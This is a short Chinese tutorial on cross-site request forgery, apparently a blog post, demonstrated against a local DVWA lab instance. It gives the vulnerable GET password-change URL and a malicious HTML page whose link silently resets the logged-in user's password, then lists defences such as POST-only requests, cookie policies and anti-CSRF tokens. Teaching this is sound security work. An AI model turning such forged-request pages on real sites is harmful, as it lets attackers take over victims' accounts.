簡述CSRF請求跨站僞造

首先什麼是CSRF：

如圖：

    1，用戶通過瀏覽器正常訪問帶有CSRF漏洞的網站。

        如我去訪問http://127.0.0.1:8080/DVWA/login.php

        

        我們登錄進去賬號是：admin 密碼是：password，找到一個修改密碼的地方

        

        修改密碼爲123456，修改的url是：

        http://127.0.0.1:8080/DVWA/vulnerabilities/csrf/password_new=123456&password_conf=123456&Change=Change#

        

        

    2,我們構造惡意網站B將代碼保存爲index.html

<html>
	<head>
	
	<title>這是惡意網頁</title>
	</head>
	
	<body>
	<h1>這是惡意網頁<h1>
	<a href="http://127.0.0.1:8080/DVWA/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#">***</a> 
	
	</body>

</html>

        我們訪問網站B：點擊***

        

     

        我們可以看到密碼被改了（改成了password）

        

防禦：

   1.儘量使用POST，限制GET

   2.瀏覽器Cookie策略

   3.Anti CSRF Token

---

微信公衆號：